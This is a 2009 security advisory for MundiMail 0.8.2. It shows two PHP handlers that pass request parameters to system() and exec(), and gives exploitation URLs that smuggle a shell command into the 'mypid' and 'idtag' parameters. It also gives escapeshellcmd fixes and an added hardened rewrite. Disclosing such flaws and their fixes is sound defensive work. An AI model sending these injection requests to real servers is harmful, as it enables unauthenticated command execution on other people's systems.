
# Title : MundiMail 0.8.2 Remote Code Execution
# Published : 2009-09-07
# Author : Dedalo


# Reference: http://www.ccat.edu.mx/advisors/advisor5/advisor5.html
# Credits: Ccat Research Labs   - México - Coatepec, Ver.  www.ccat.edu.mx

# Software Link: http://sourceforge.net/projects/mundimail/
# Tested on: Debian, CentOS & Windows Server 2000

Summary:

The code passes request parameters straight to system() and exec() without sanitizing them, so an unauthenticated request can run shell commands as the web server user.


1.- First Vulnerable Code

//need to kill daemon
$cmd = "/bin/kill";
$cmd .= " " . $_REQUEST["mypid"];
system($cmd);

2.- Exploitation

/admin/status/index.php?mypid=command;


3.- Fix


$cmd .= " " . escapeshellcmd($_REQUEST["mypid"]);

4.- Second Vulnerable Code

$cmd = ROOTDIR . "include/massmail.php";
$cmd .= ' ' . $_REQUEST["idtag"];
$cmd .= ' > /dev/null';
$cmd .= ' &';
echo $cmd . "<br>\n";
exec($cmd);
$mid = "../mail/success.php";

5.- Exploitation

/admin/status/index.php?idtag=command;


6.- Fix

$cmd .= ' ' . escapeshellcmd($_REQUEST["idtag"]);
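For comparison, here is a hardened rewrite of both handlers above. This is an added example, not MundiMail's code or the advisory's own fix: the function names, the whitelist check and the ROOTDIR placeholder are this example's assumptions; the request parameter names mypid and idtag are the ones from the advisory. It validates each value as a plain integer before any shell call, and uses escapeshellarg() (which quotes the whole value as one argument) as defence in depth, since escapeshellcmd() alone still lets whitespace split the value into extra arguments.

```php
<?php
// Added example, not part of MundiMail. ROOTDIR is a placeholder here;
// in the real application it is defined by the project's own config.
if (!defined('ROOTDIR')) {
    define('ROOTDIR', '/path/to/mundimail/');   // placeholder path
}

// Primary control: a PID or tag id is always a small positive integer.
// Anything else is rejected before it can reach a shell.
function requirePositiveInt($value): int
{
    if (!is_string($value) || !preg_match('/^[1-9][0-9]{0,9}$/', $value)) {
        http_response_code(400);
        exit('invalid id');
    }
    return (int) $value;
}

// Hardened form of "1.- First Vulnerable Code".
function killDaemon(array $request): void
{
    $pid = requirePositiveInt($request['mypid'] ?? null);
    // escapeshellarg() wraps the value in single quotes so the shell sees
    // exactly one argument; kept even though $pid is already an int.
    system('/bin/kill ' . escapeshellarg((string) $pid));
}

// Hardened form of "4.- Second Vulnerable Code".
function startMassMail(array $request): void
{
    $idtag = requirePositiveInt($request['idtag'] ?? null);
    $cmd = escapeshellarg(ROOTDIR . 'include/massmail.php')
         . ' ' . escapeshellarg((string) $idtag)
         . ' > /dev/null 2>&1 &';
    // Do not echo $cmd back to the client: it leaks the install path.
    exec($cmd);
}

// $_POST rather than $_REQUEST, so the ids cannot be supplied via a
// crafted link or cookie (an assumption of this example, not the advisory).
if (isset($_POST['mypid'])) {
    killDaemon($_POST);
} elseif (isset($_POST['idtag'])) {
    startMassMail($_POST);
}
```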


7.- Other

Other fixes are possible; this is an easy one ;)


8.- Greetz

www[dot]seguridadblanca[dot]com


--------------
Happy Hacking
--------------